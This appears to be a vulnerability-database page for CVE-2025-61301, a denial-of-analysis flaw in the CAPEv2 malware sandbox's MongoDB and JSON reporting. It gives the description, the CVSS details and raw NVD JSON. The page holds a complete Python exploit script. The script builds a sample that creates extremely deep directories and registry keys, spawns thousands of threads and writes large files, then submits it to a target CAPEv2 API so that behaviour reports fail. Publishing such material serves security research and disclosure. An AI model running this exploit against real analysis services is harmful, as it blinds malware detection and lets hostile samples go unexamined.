Security Vulnerability Report
中文
CVE-2025-61301 CVSS 7.5 HIGH

CVE-2025-61301

Published: 2025-10-20 21:15:38
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Denial-of-analysis in reporting/mongodb.py and reporting/jsondump.py in CAPEv2 (commit 52e4b43, on 2025-05-17) allows attackers who can submit samples to cause incomplete or missing behavioral analysis reports by generating deeply nested or oversized behavior data that trigger MongoDB BSON limits or orjson recursion errors when the sample executes in the sandbox.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

CAPEv2 commit 52e4b43(2025-05-17)及之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61301 PoC - Denial-of-Analysis via Oversized/Deeply Nested Behavior Data # This PoC demonstrates how a crafted sample can trigger MongoDB BSON limits # or orjson recursion errors in CAPEv2's reporting module. import requests import zipfile import os import tempfile # CAPEv2 web submission API endpoint CAPEV2_URL = "http://target-capev2:8000/apiv2/tasks/create/file/" API_TOKEN = "your_api_token_here" def create_malicious_sample(): """ Create a sample that generates deeply nested or oversized behavior data when executed in the CAPEv2 sandbox. The sample will: 1. Create deeply nested directories (triggers filesystem monitoring recursion) 2. Create deeply nested registry keys (Windows only) 3. Rapidly spawn processes/threads (triggers API log overflow) """ sample_code = ''' import os import sys import threading import time def create_deep_directories(base_path, depth): """Create deeply nested directories to trigger deep path monitoring""" current = base_path for i in range(depth): current = os.path.join(current, f"level_{i}_padding_to_increase_path_length_{'A'*50}") try: os.makedirs(current, exist_ok=True) except: pass def spawn_many_threads(count): """Spawn many threads to generate excessive API call logs""" threads = [] for i in range(count): t = threading.Thread(target=lambda: time.sleep(60)) t.daemon = True threads.append(t) t.start() def create_deep_registry_keys(depth): """Create deeply nested registry keys (Windows)""" try: import winreg key_path = r"Software\\CAPEv2_Test" current_key = winreg.HKEY_CURRENT_USER for i in range(depth): key_path += f"\\SubKey_{i}_{'X'*30}" try: current_key = winreg.CreateKey(current_key, f"SubKey_{i}_{'X'*30}") except: break except ImportError: pass def generate_large_files(count, size_mb): """Generate large files to increase behavior log size""" data = b"A" * (1024 * 1024) # 1MB of data for i in range(count): path = os.path.join(tempfile.gettempdir(), f"large_file_{i}.dat") with open(path, "wb") as f: for _ in range(size_mb): f.write(data) if __name__ == "__main__": # Strategy 1: Create deeply nested directories (depth > 1000) create_deep_directories(os.path.expanduser("~"), 1500) # Strategy 2: Spawn excessive threads (triggers API log overflow) spawn_many_threads(5000) # Strategy 3: Create deeply nested registry keys (Windows) create_deep_registry_keys(1500) # Strategy 4: Generate large files to exceed BSON 16MB limit generate_large_files(20, 5) print("Sample execution complete") ''' # Write sample to a temporary file sample_path = os.path.join(tempfile.gettempdir(), "cve_2025_61301_sample.py") with open(sample_path, "w") as f: f.write(sample_code) return sample_path def submit_to_capev2(sample_path): """Submit the malicious sample to CAPEv2""" with open(sample_path, "rb") as f: files = {"file": (os.path.basename(sample_path), f, "application/octet-stream")} headers = {"Authorization": f"Bearer {API_TOKEN}"} response = requests.post(CAPEV2_URL, files=files, headers=headers) if response.status_code == 200: print(f"[+] Sample submitted successfully. Task ID: {response.json().get('task_id')}") print("[!] The analysis report will be incomplete or missing due to CVE-2025-61301") else: print(f"[-] Submission failed: {response.status_code}") if __name__ == "__main__": sample = create_malicious_sample() submit_to_capev2(sample) os.remove(sample)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61301", "sourceIdentifier": "[email protected]", "published": "2025-10-20T21:15:38.203", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Denial-of-analysis in reporting/mongodb.py and reporting/jsondump.py in CAPEv2 (commit 52e4b43, on 2025-05-17) allows attackers who can submit samples to cause incomplete or missing behavioral analysis reports by generating deeply nested or oversized behavior data that trigger MongoDB BSON limits or orjson recursion errors when the sample executes in the sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "http://capev2.com", "source": "[email protected]"}, {"url": "https://github.com/eGkritsis/CVE-2025-61301", "source": "[email protected]"}, {"url": "https://github.com/kevoreilly/CAPEv2", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.